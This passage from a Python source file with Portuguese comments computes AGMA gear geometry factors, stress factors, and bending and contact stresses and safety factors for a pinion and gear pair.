b\r\n self.r_a = r_a\r\n\r\n self.r_b = r_b\r\n\r\n self.s_n = s_n\r\n \r\n \r\n \r\n \"Dimensões Coroa\"\r\n r_n2 = r_n*m_g\r\n a_2 = 1\r\n b_2 = 1.25\r\n c_2 = b_2-a_2\r\n r_r2 = r_n2-b_2\r\n r_b2 = r_b*m_g\r\n r_f2 = r_r2+c_2\r\n \r\n r_a2 = (N_g/np.cos(psi) + 2*(1-x))/2\r\n \r\n self.r_n2 = r_n2\r\n self.a_2 = a_2\r\n self.b_2 = b_2\r\n self.r_a2 = r_a2\r\n self.r_r2 = r_r2\r\n self.r_b2 = r_b2\r\n self.r_f2 = r_f2\r\n\r\n \r\n\r\n \r\n \"Perfil de Involuta\"\r\n \r\n C_r = (N_p+N_g)/(2*np.cos(psi))\r\n phi_r = (np.arccos((r_b2+r_b)/C_r) if orientation == 'external' \r\n else np.arccos((r_b2-r_b)/C_r))\r\n p_n = np.pi*np.cos(phi_n)\r\n p_b = 2*np.pi*r_b/N_p\r\n psi_b = np.arccos(p_n/p_b)\r\n \r\n \r\n C_6 = C_r*np.sin(phi_r)\r\n C_1 = (C_6 - (r_a2**2-r_b2**2)**0.5 if orientation == 'external' \r\n else -(C_6 - (r_a2**2-r_b2**2)**0.5))\r\n C_3 = (C_6/(m_g+1) if orientation == 'external' \r\n else C_6/(m_g-1))\r\n C_4 = C_1+p_b\r\n C_5 = (r_a**2-r_b**2)**0.5\r\n C_2 = C_5-p_b\r\n \r\n Z = C_5-C_1\r\n m_p = Z/p_b\r\n \r\n p_x = np.pi/np.sin(psi) if psi!=0 else 0\r\n \r\n m_F = F/p_x if psi!=0 else 0\r\n \r\n self.phi_r = phi_r\r\n self.psi_b = psi_b\r\n self.C_1 = C_1\r\n self.C_2 = C_2\r\n self.C_3 = C_3\r\n self.C_4 = C_4\r\n self.C_5 = C_5\r\n self.C_6 = C_6\r\n self.C_r = C_r\r\n self.Z= Z\r\n self.m_F = m_F\r\n self.m_p = m_p\r\n self.p_x = p_x\r\n \r\n \"Comprimento Mínimo das Linhas de Contato\"\r\n \r\n n_r = m_p%1\r\n n_a = m_F%1\r\n \r\n if psi == 0: #para engrenagens de dentes retor\r\n L_min = F\r\n \r\n elif n_a<=1-n_r: #engrenagens helicoidais\r\n L_min = (m_p*F-n_a*n_r*p_x)/np.cos(psi_b)\r\n else:\r\n L_min = (m_p*F-(1-n_a)*(1-n_r)*p_x)/np.cos(psi_b)\r\n \r\n \"Partilhamento de Carga\" \r\n m_N = F/L_min\r\n \r\n \"Angulo de Hélice de Operação\"\r\n psi_r = np.arctan(np.tan(psi_b)/np.cos(phi_r))\r\n phi_nr = np.arcsin(np.cos(psi_b)*np.sin(phi_r))\r\n \r\n \r\n \"Fator geométrico de resistência superficial I\"\r\n d = ((2*C_r)/(m_g+1) if orientation == 'external'\r\n else (2*C_r)/(m_g-1))\r\n \r\n r_m1 = ((1/2)*(r_a+(C_r-r_a2)) if orientation== 'external'\r\n else (1/2)*(r_a-(C_r-r_a2)))\r\n \r\n \"Raios de Giração\"\r\n if psi!=0 and m_F > 1:\r\n rho_1 = (r_m1**2 - r_b**2)**0.5\r\n rho_2 = (C_6 - rho_1 if orientation=='external'\r\n else C_6 + rho_1 )\r\n \r\n else:\r\n rho_1 = C_2\r\n rho_2 = (C_6 - rho_1 if orientation == 'external'\r\n else C_6 + rho_1)\r\n self.rho_1 = rho_1\r\n self.rho_2 = rho_2\r\n \r\n \"Fator de Sobreposição Helicoidal\"\r\n if psi!=0 and m_F < 1:\r\n rho_m1 = (r_m1**2 - r_b**2)**0.5\r\n rho_m2 = (C_6 - rho_1 if orientation=='external'\r\n else C_6 + rho_1)\r\n \r\n C_psi = (1-m_F*(1-(rho_m1*rho_m2*Z)/(rho_1*rho_2*p_n)))**0.5\r\n self.rho_m1 = rho_m1\r\n self.rho_m2 = rho_m2\r\n \r\n else:\r\n C_psi = 1\r\n \r\n \r\n self.C_psi = C_psi\r\n \r\n \r\n I = ((np.cos(phi_r)*C_psi**2)/\r\n (((1/rho_1)+(1/rho_2))*d*m_N) if orientation == 'external'\r\n else (np.cos(phi_r)*C_psi**2)/\r\n (((1/rho_1)-(1/rho_2))*d*m_N))\r\n \r\n self.I = I\r\n \r\n\r\n \r\n \"Fator de geométrico de flexão J\"\r\n if psi!=0:\r\n N_1v = N_p/(np.cos(psi)**3)\r\n r_1v = N_1v/2\r\n r_b1v = r_1v*np.cos(phi_n)\r\n r_a1v = r_1v+r_a-r_n\r\n else:\r\n N_1v = N_p\r\n r_1v = r_n\r\n r_b1v = r_b\r\n \r\n \r\n r_2v = r_1v*m_g\r\n r_b2v = r_b1v*m_g\r\n r_a2v = r_2v+r_a2-r_n2\r\n \r\n \r\n C_6v = (r_b2v+r_b1v)*np.tan(phi_nr)\r\n C_1v = (C_6v-(r_a2v**2-r_b2v**2)**0.5)\r\n C_4v = C_1v+p_n\r\n \r\n\r\n \r\n self.phi_nr =phi_nr\r\n self.r_1v =r_1v\r\n self.r_b1v =r_b1v\r\n self.r_2v =r_2v\r\n 
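# Observação: para engrenagens helicoidais a AGMA trabalha com a engrenagem\r\n        # virtual equivalente no plano normal, N_v = N/cos(psi)**3. Exemplo\r\n        # numérico hipotético, apenas para conferir a ordem de grandeza: com\r\n        # N_p = 20 e psi = 20 graus, N_1v = 20/np.cos(np.deg2rad(20))**3 ~ 24.1\r\n        # dentes, e r_1v = N_1v/2 é o raio adimensional usado no fator J.\r\n        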
self.r_a2v =r_a2v\r\n self.r_b2v =r_b2v\r\n self.C_1v = {}\r\n self.C_4v = {}\r\n self.C_6v = {} \r\n \r\n pinion_geometry = [N_p,r_n,r_a,r_b,n_p,'pinnion']\r\n gear_geometry = [N_g,r_n2,r_a2,r_b2,n_g,'gear']\r\n geometry_list = [pinion_geometry,\r\n gear_geometry]\r\n\r\n self.m_p = {}\r\n self.tan_phi_nW = {}\r\n self.r_bv = {}\r\n self.phi_nL = {}\r\n self.phi_line = {}\r\n self.phi_n = {}\r\n self.phi_ni = {}\r\n self.phi_ns = {}\r\n self.lambda_nF = {}\r\n self.alpha = {}\r\n self.mu_n0 = {}\r\n self.r_nL = {}\r\n self.r_n_line = {}\r\n self.r_n0_line = {}\r\n self.lambd = {}\r\n self.theta_n0 = {} \r\n self.theta_n = {} \r\n self.beta_n = {} \r\n self.eta_nF = {} \r\n self.xi_nF = {} \r\n self.h_f = {} \r\n self.K_F = {} \r\n self.K_S = {} \r\n self.convergence_flag = {} \r\n self.rho_min = {} \r\n self.s_f = {} \r\n self.H = {} \r\n self.L = {} \r\n self.M = {} \r\n self.K_f = {} \r\n self.Y = {} \r\n self.J = {}\r\n self.K_v = {}\r\n self.V = {}\r\n self.V_max = {}\r\n self.Y_lewis = {}\r\n self.K_s = {}\r\n \r\n for geometry in geometry_list:\r\n N_i = geometry[0]\r\n r_i = geometry[1]\r\n r_ai = geometry[2]\r\n r_bi = geometry[3]\r\n n_i = geometry[4]\r\n tag = geometry[5]\r\n \r\n #Angulo de Pressão no Ponto de Aplicação\r\n if (psi !=0 and m_F>1) or (psi == 0 and load == \"tip\"):\r\n tan_phi_nW = ((r_a1v/r_b1v)**2-1)**0.5\r\n else:\r\n tan_phi_nW = C_4v/r_b1v \r\n \r\n #Geometria virtual\r\n if psi!=0:\r\n N_v = N_i/(np.cos(psi)**3)\r\n r_v = N_v/2\r\n r_bv = r_v*np.cos(phi_n)\r\n\r\n else:\r\n N_v = N_i\r\n r_v = r_i\r\n r_bv = r_bi\r\n\r\n \"Virtual cutter tool, cremalheira - appendix D\"\r\n \r\n if psi != 0:\r\n N_0 = N_c/(np.cos(psi)**3)\r\n r_n0 = N_0/2\r\n r_nb0 = r_n0*np.cos(phi_n)\r\n\r\n else:\r\n N_0 = N_c\r\n r_n0 = r_c\r\n r_nb0 = r_bc\r\n \r\n\r\n self.x_0 = x_0\r\n s_n0= np.pi/2+2*x_0*np.tan(phi_n)\r\n \r\n r_s0 = r_n0 + a_0 + x_0 - rho_a0\r\n \r\n \r\n self.r_n0 = r_n0\r\n self.a_0 = a_0\r\n self.b_0 = b_0\r\n self.r_s0 = r_s0\r\n self.r_nb0 = r_nb0\r\n self.s_n0 = s_n0 \r\n \r\n \r\n \"Angulos de Geração\"\r\n inv_phi_n = np.tan(phi_n) - phi_n\r\n \r\n inv_phi_np = inv_phi_n + s_n/(2*r_v)\r\n \r\n phi_nL = tan_phi_nW - inv_phi_np\r\n \r\n r_nL = r_bv/np.cos(phi_nL)\r\n\r\n phi_ns = np.arccos(r_nb0/r_s0)\r\n \r\n inv_phi_np0 = inv_phi_n + s_n0/(2*r_n0)\r\n \r\n inv_phi_ns = np.tan(phi_ns)-phi_ns\r\n \r\n lambd = 2*(inv_phi_np0-inv_phi_ns-rho_a0/r_nb0)\r\n \r\n inv_phi_line = inv_phi_n + (2*(x_g+x_0)*np.tan(phi_n))/(N_v+N_0)\r\n phi_ni = (3*inv_phi_line)**0.33\r\n\r\n for i in range(10):\r\n phi_line = phi_ni + (inv_phi_line+phi_ni-np.tan(phi_ni))/(np.tan(phi_ni)**2)\r\n phi_ni = phi_line\r\n \r\n r_n_line = r_v*np.cos(phi_n)/np.cos(phi_line)\r\n r_n0_line = r_n0*np.cos(phi_n)/np.cos(phi_line)\r\n \r\n \r\n \"Curva de lewis\"\r\n \r\n alpha_i = np.pi/2\r\n y = 1\r\n \r\n alpha_counter = 0\r\n max_it = 15\r\n convergence_flag = 0\r\n while abs(y) > 1e-3 and alpha_counter<=max_it:\r\n \r\n mu_n0 = np.arccos(r_n0_line*np.cos(alpha_i)/r_s0)-alpha_i\r\n \r\n K_S = r_n0_line*np.sin(alpha_i) - r_s0*np.sin(alpha_i+mu_n0)\r\n \r\n K_F = K_S - rho_a0\r\n \r\n theta_n0 = mu_n0 - lambd/2 + np.pi/N_0\r\n \r\n theta_n = N_0/N_v*theta_n0\r\n \r\n beta_n = alpha_i - theta_n\r\n \r\n xi_nF = r_n_line*np.sin(theta_n)+K_F*np.cos(beta_n)\r\n \r\n eta_nF = r_n_line*np.cos(theta_n)+K_F*np.sin(beta_n)\r\n \r\n #Altura da curva de Lewis\r\n h_f = r_nL - eta_nF\r\n \r\n y = 2*h_f*np.tan(beta_n) - xi_nF\r\n y_line = (2*h_f/(np.cos(beta_n)**2) - K_F*np.sin(beta_n)\r\n 
+N_0/N_v*((r_n0_line*np.sin(alpha_i)/(r_s0*np.sin(alpha_i+mu_n0)))-1)\r\n *(2*xi_nF*np.tan(beta_n)-eta_nF-(2*h_f)/np.cos(beta_n)**2)\r\n -r_n0_line*(np.cos(alpha_i)-np.sin(alpha_i)/np.tan(alpha_i+mu_n0))\r\n *((1+np.sin(beta_n)**2)/np.cos(beta_n))) \r\n \r\n alpha = alpha_i - y/y_line\r\n alpha_i = alpha\r\n alpha_counter +=1\r\n \r\n if alpha_counter >= max_it-1:\r\n #print('Erro de Convergência para Alpha!!')\r\n convergence_flag = 1\r\n\r\n \r\n #raio de adoçamento mínimo\r\n rho_min = (rho_a0 + \r\n ((r_n0_line-r_s0)**2)/\r\n (r_n_line*r_n0_line/\r\n (r_n_line+r_n0_line)-(r_n0_line-r_s0)))\r\n\r\n \r\n #Fator helicoidal\r\n if psi!=0 and m_F>1:\r\n omega = np.rad2deg(np.arctan(np.tan(psi)*np.sin(phi_n)))\r\n C_h = 1/(1-((omega/100)*(1-omega/100)))**0.5\r\n else:\r\n C_h = 1\r\n \r\n #Espessura crítica da curva de Lewis\r\n s_f = abs(2*xi_nF)\r\n\r\n \r\n #Fator de Forma:\r\n H = 0.331-0.436*phi_n\r\n L = 0.324-0.492*phi_n\r\n M = 0.261+0.545*phi_n\r\n\r\n \r\n K_f = H +((s_f/rho_min)**L)*((s_f/h_f)**M)\r\n\r\n #Fator de ANgulo de Hélice\r\n if psi!=0 and m_F>1:\r\n K_psi = np.cos(psi_r)*np.cos(psi) \r\n else:\r\n K_psi = 1\r\n \r\n #Fator Y:\r\n Y = K_psi/((np.cos(phi_nL)/np.cos(phi_nr))\r\n *((6*h_f/(s_f**2*C_h))-np.tan(phi_nL)/s_f))\r\n \r\n\r\n #Fator de Forma:\r\n J = (Y*C_psi/(K_f*m_N))\r\n \r\n \r\n \"Fator Dinâmico K_v\"\r\n \r\n V = abs(np.pi*n_i*(r_n/P)/6)\r\n B = 0.25*(12-Q_v)**(2/3)\r\n A = 50+56*(1-B)\r\n \r\n K_v = ((A+np.sqrt(V))/A)**B\r\n \r\n V_max = (A + (Q_v - 3))**2\r\n \r\n \r\n \"Fator de Tamanho\"\r\n\r\n F = F/P\r\n \r\n u = ((s_f/P)**2)/(4*h_f/P)\r\n Y_lewis = 2*u*P/3\r\n \r\n #Shigley:\r\n K_s = 1.192*((F*Y_lewis**0.5)/P)**0.0535\r\n \r\n #AGMA\r\n if K_s < 1:\r\n K_s = 1\r\n\r\n self.C_1v[tag] = C_1v\r\n self.C_4v[tag] = C_4v\r\n self.C_6v[tag] = C_6v\r\n self.m_p[tag] = m_p\r\n self.tan_phi_nW[tag] = tan_phi_nW\r\n self.r_bv[tag] = r_bv\r\n self.phi_nL[tag] = phi_nL\r\n self.phi_line[tag] = phi_line\r\n self.phi_n[tag] = phi_n\r\n self.phi_ni[tag] = phi_ni\r\n self.phi_ns[tag] = phi_ns\r\n self.lambda_nF[tag] = lambd\r\n self.alpha[tag] = alpha\r\n self.mu_n0[tag] = mu_n0\r\n self.r_nL[tag] = r_nL\r\n self.r_n_line[tag] = r_n_line\r\n self.r_n0_line[tag] = r_n0_line\r\n self.lambd[tag] = lambd\r\n self.theta_n0[tag] = theta_n0\r\n self.theta_n[tag] = theta_n\r\n self.beta_n[tag] = beta_n\r\n self.eta_nF[tag] = eta_nF\r\n self.xi_nF[tag] = xi_nF\r\n self.h_f[tag] = h_f\r\n self.K_F[tag] = K_F\r\n self.K_S[tag] = K_S\r\n self.convergence_flag[tag] = convergence_flag \r\n self.rho_min[tag] = rho_min\r\n self.s_f[tag] = s_f\r\n self.H[tag] = H\r\n self.L[tag] = L\r\n self.M[tag] = M\r\n self.K_f[tag] = K_f\r\n self.Y[tag] = Y\r\n self.J[tag] = J\r\n self.K_v[tag] = K_v\r\n self.V[tag] = V\r\n self.V_max[tag] = V_max\r\n self.Y_lewis[tag] = Y_lewis\r\n self.K_s[tag] = K_s\r\n \r\n \r\n \"Fator de Condição de Superfície\"\r\n if detrimento_superficie == True:\r\n C_f = 1.5\r\n else:\r\n C_f = 1\r\n \r\n self.C_f = C_f\r\n \r\n \"Fator de Distribuição de Carga K_m\"\r\n lookup = {1:'aberto',\r\n 2:'fechado comercial',\r\n 3:'fechado preciso',\r\n 4:'fechado extra-preciso'\r\n }\r\n \r\n if type(engrenamento) is int:\r\n engrenamento = lookup[engrenamento]\r\n \r\n condition = ((F/(2*r_n/P)) <= 2) and (F <= 40)\r\n\r\n if condition == True:\r\n C_mc = 1 if coroamento == False else 0.8\r\n C_pf = (F/(10*2*r_n/P) - 0.025 if F <= 1\r\n else F/(10*2*r_n/P) - 0.0375 + 0.0125*F if F<= 17 \r\n else F/(10*2*r_n/P) - 0.1109 + 0.0207*F - 0.00338* F**2)\r\n C_pm = 1 #ALTERAR 
PARA A PARTE 2\r\n C_ma_dic = {'aberto' : [0.247,0.0167,-0.765e-4],\r\n 'fechado comercial' : [0.127,0.0158,-0.930e-4],\r\n 'fechado preciso' : [0.0675,0.0128,-0.926e-4],\r\n 'fechado extra-preciso' : [0.00360,0.0102,-0.822e-4]}\r\n A = C_ma_dic[engrenamento.lower()][0]\r\n B = C_ma_dic[engrenamento.lower()][1]\r\n C = C_ma_dic[engrenamento.lower()][2] \r\n C_ma = A+B*F+C*F**2\r\n C_e = 0.8 if montagem_ajustada else 1\r\n\r\n K_m = 1+C_mc*(C_pf*C_pm+C_ma*C_e)\r\n \r\n else:\r\n K_m = 1\r\n \r\n \r\n self.K_m = K_m\r\n \r\n \"Fator de Razaõ de Dureza\"\r\n if m_g >= 1:\r\n C_H = 1\r\n \r\n \r\n elif 1/(H_Bp/H_Bg) >= 1.2: \r\n if 1/(H_Bp/H_Bg) > 1.7:\r\n A_line = 0.00698\r\n else:\r\n A_line = (9.98e-3*(H_Bp/H_Bg)-8.29e-3)\r\n C_H = 1 + A_line*(1/m_g - 1)\r\n \r\n else:\r\n C_H = 1\r\n \r\n self.C_H = C_H\r\n \r\n \"Fator de Sobrecarga\"\r\n over_dic = {'uniforme': {'uniforme': 1,\r\n 'leve': 1.25,\r\n 'intenso': 1.75},\r\n 'leve' : {'uniforme': 1.25,\r\n 'leve': 1.5,\r\n 'intenso': 2},\r\n 'medio': {'uniforme': 1.5,\r\n 'leve': 1.5,\r\n 'intenso': 2.25}}\r\n \r\n pot_key = fonte_potencia.lower().replace('é','e')\r\n machine_key = choque_maquina.lower().replace('é','e')\r\n \r\n if len(pot_key.split())>1:\r\n pot_key = pot_key.split()[1]\r\n \r\n if len(machine_key.split())>1:\r\n machine_key = machine_key.split()[1]\r\n \r\n K_0 = over_dic[pot_key][machine_key]\r\n \r\n self.K_0 = K_0\r\n \r\n \"Fatores de Ciclagem de Tensão\"\r\n \r\n #Y_N\r\n Y_N = {}\r\n \r\n if N_cyc < 3e6:\r\n if tratamento.lower() == 'nitretado':\r\n Y_N['pinnion'] = 4.9404*N_cyc**-0.1045\r\n elif tratamento.lower()[0:11] == 'carbonetado':\r\n Y_N['pinnion'] = 6.1514*N_cyc**-0.1192\r\n elif abs(H_Bp-160) < abs(H_Bp-250) and abs(H_Bp-160) < abs(H_Bp-400):\r\n Y_N['pinnion'] = 2.3194*N_cyc**-0.0538\r\n elif abs(H_Bp-250) < abs(H_Bp-160) and abs(H_Bp-250) < abs(H_Bp-400):\r\n Y_N['pinnion'] = 4.9404*N_cyc**-0.1045\r\n else:\r\n Y_N['pinnion'] = 9.4518*N_cyc**-0.148\r\n else:\r\n Y_N['pinnion'] = 1.3558*N_cyc**-0.0178 #Mais conservadora\r\n \r\n if N_cyc < 3e6:\r\n if tratamento.lower() == 'nitretado':\r\n Y_N['gear'] = 4.9404*N_cyc**-0.1045\r\n elif tratamento.lower()[0:11] == 'carbonetado':\r\n Y_N['gear'] = 6.1514*N_cyc**-0.1192\r\n elif abs(H_Bg-160) < abs(H_Bg-250) and abs(H_Bg-160) < abs(H_Bg-400):\r\n Y_N['gear'] = 2.3194*N_cyc**-0.0538\r\n elif abs(H_Bg-250) < abs(H_Bg-160) and abs(H_Bg-250) < abs(H_Bg-400):\r\n Y_N['gear'] = 4.9404*N_cyc**-0.1045\r\n else:\r\n Y_N['gear'] = 9.4518*N_cyc**-0.148\r\n else:\r\n Y_N['gear'] = 1.3558*N_cyc**-0.0178 #Mais conservadora\r\n \r\n \r\n self.Y_N = Y_N\r\n \r\n #Z_N\r\n if N_cyc < 1e7:\r\n if tratamento.lower() == 'nitretado':\r\n Z_N = 1.249*N_cyc**-0.0138\r\n else:\r\n Z_N = 2.466*N_cyc**-0.056\r\n else:\r\n Z_N = 1.4488*N_cyc**-0.023 #Mais conservadora\r\n \r\n self.Z_N = Z_N\r\n \r\n \"Coeficiente Elástico C_p\"\r\n \r\n C_p = np.sqrt(1/(np.pi*((1-poisson_p**2)/(self.E_p)+(1-poisson_g**2)/(self.E_g))))\r\n \r\n self.C_p = C_p \r\n \r\n \"Fator de Confiabilidade\"\r\n \r\n if trust == 99.99:\r\n K_r = 1.5\r\n elif trust == 99.9:\r\n K_r = 1.25\r\n elif trust == 99:\r\n K_r = 1\r\n elif trust == 90:\r\n K_r = 0.85\r\n elif trust > 50 and trust <99:\r\n K_r = 0.658-0.0759*np.log(1-trust/100)\r\n elif trust > 99:\r\n K_r = 0.5-0.109*np.log(1-trust/100)\r\n else:\r\n print('Confiabilidade Muito Baixa!!!')\r\n \r\n self.K_r = K_r\r\n \r\n \"Fator de Temperatura\"\r\n if temperatura <= 120:\r\n K_T = 1\r\n else:\r\n K_T = 1.5\r\n \r\n self.K_T = K_T\r\n \r\n \"Espessura de 
Aro\"\r\n self.K_B = 1\r\n \r\n def bending_stress_g(self,W_t):\r\n \"\"\"\r\n Tensão de flexão na coroa\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['gear']\r\n K_s = self.K_s['gear']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n K_B = self.K_B\r\n J =self.J['gear']\r\n sigma = W_t*K_0*K_v*K_s*(P/F)*(K_m*K_B/J)\r\n return sigma\r\n \r\n def bending_stress_p(self,W_t):\r\n \"\"\"\r\n Tensão de flexão no pinhão\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['pinnion']\r\n K_s = self.K_s['pinnion']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n K_B = self.K_B\r\n J =self.J['pinnion']\r\n sigma = W_t*K_0*K_v*K_s*(P/F)*(K_m*K_B/J)\r\n return sigma\r\n \r\n \r\n def contact_stress_g(self,W_t):\r\n \"\"\"\r\n Tensão de contato na coroa\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['gear']\r\n K_s = self.K_s['gear']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n C_p = self.C_p\r\n C_f = self.C_f\r\n r_p = self.r_n/P\r\n I =self.I\r\n sigma = C_p*(W_t*K_0*K_v*K_s*(K_m/(2*r_p*F))*(C_f/I))**0.5\r\n return sigma\r\n \r\n def contact_stress_p(self,W_t):\r\n \"\"\"\r\n Tensão de contato no pinhão\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['pinnion']\r\n K_s = self.K_s['pinnion']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n C_p = self.C_p\r\n C_f = self.C_f\r\n r_p = self.r_n/P\r\n I =self.I\r\n sigma = C_p*(W_t*K_0*K_v*K_s*(K_m/(2*r_p*F))*(C_f/I))**0.5\r\n return sigma\r\n \r\n def max_bending_g(self,S_t,S_F):\r\n \"\"\"\r\n Máxima tensão de flexão na coroa\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência à flexão.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['gear']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_t/S_F)*Y_N/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_bending_p(self,S_t,S_F):\r\n \"\"\"\r\n Máxima tensão de flexão admissível no pinhão\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência à flexão.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['pinnion']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_t/S_F)*Y_N/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_contact_g(self,S_c,S_F):\r\n \"\"\"\r\n Máxima tensão de contato admissível na coroa\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência ao contato.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = self.C_H\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_c/S_F)*(Z_N*C_H)/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_contact_p(self,S_c,S_F):\r\n \"\"\"\r\n Máxima tensão de contato admissível no pinhão\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência ao contato.\r\n S_F :float\r\n Fator de 
segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = 1\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_c/S_F)*(Z_N*C_H)/(K_T*K_r)\r\n return max_sigma\r\n \r\n def safety_bending_g(self,S_t,W_t):\r\n \"\"\"\r\n Fator de segurança\r\n\r\n Parameters\r\n ----------\r\n S_t : Float\r\n Tensão máxima de flexão admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança a Flexão da Coroa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['gear']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma = self.bending_stress_g(W_t)\r\n S_F = ((S_t*Y_N)/(K_T*K_r))/sigma\r\n return S_F\r\n\r\n def safety_bending_p(self,S_t,W_t):\r\n \"\"\"\r\n\r\n Parameters\r\n ----------\r\n S_t : Float\r\n Tensão máxima de flexão admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança a Flexão do Pinhão.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['pinnion']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma = self.bending_stress_p(W_t)\r\n S_F = ((S_t*Y_N)/(K_T*K_r))/sigma\r\n return S_F\r\n \r\n def safety_contact_g(self,S_c,W_t):\r\n \"\"\"\r\n\r\n Parameters\r\n ----------\r\n S_c : Float\r\n Tensão máxima de contato admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança ao Contato da Coroa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = self.C_H\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma_c = self.contact_stress_g(W_t)\r\n S_F = ((S_c*Z_N*C_H)/(K_T*K_r))/sigma_c\r\n return S_F\r\n \r\n def safety_contact_p(self,S_c,W_t):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n S_c : Float\r\n Tensão máxima de contato admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança ao Contato do Pinhão.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = 1\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma_c = self.contact_stress_p(W_t)\r\n S_F = ((S_c*Z_N*C_H)/(K_T*K_r))/sigma_c\r\n return S_F\r\n \r\n def report_agma(self,precision=2,latex=False):\r\n params_dict = {'Parâmetros':['J',\r\n 'I',\r\n 's_f',\r\n 'h_f',\r\n 'Y',\r\n 'K_s',\r\n 'K_v',\r\n 'K_0',\r\n 'K_m',\r\n 'C_p',\r\n 'C_f',\r\n 'K_T',\r\n 'K_r',\r\n 'C_H',\r\n 'Z_N',\r\n 'Y_l',\r\n 'K_B'],\r\n 'Pinhão':[f'{self.J[\"pinnion\"]:.{precision}f}',\r\n f'{self.I:.{precision}f}',\r\n f'{self.s_f[\"pinnion\"]:.{precision}f}',\r\n f'{self.h_f[\"pinnion\"]:.{precision}f}',\r\n f'{self.Y[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_s[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_v[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_0:.{precision}f}',\r\n f'{self.K_m:.{precision}f}',\r\n f'{self.C_p:.{precision}f}',\r\n f'{self.C_f:.{precision}f}',\r\n f'{self.K_T:.{precision}f}',\r\n f'{self.K_r:.{precision}f}',\r\n f'{self.C_H:.{precision}f}',\r\n f'{self.Z_N:.{precision}f}',\r\n f'{self.Y_lewis[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_B:.{precision}f}'],\r\n 'Coroa':[f'{self.J[\"gear\"]:.{precision}f}',\r\n f'{self.I:.{precision}f}',\r\n f'{self.s_f[\"gear\"]:.{precision}f}',\r\n f'{self.h_f[\"gear\"]:.{precision}f}',\r\n f'{self.Y[\"gear\"]:.{precision}f}',\r\n f'{self.K_s[\"gear\"]:.{precision}f}',\r\n f'{self.K_v[\"gear\"]:.{precision}f}',\r\n f'{self.K_0:.{precision}f}',\r\n f'{self.K_m:.{precision}f}',\r\n f'{self.C_p:.{precision}f}',\r\n f'{self.C_f:.{precision}f}',\r\n f'{self.K_T:.{precision}f}',\r\n 
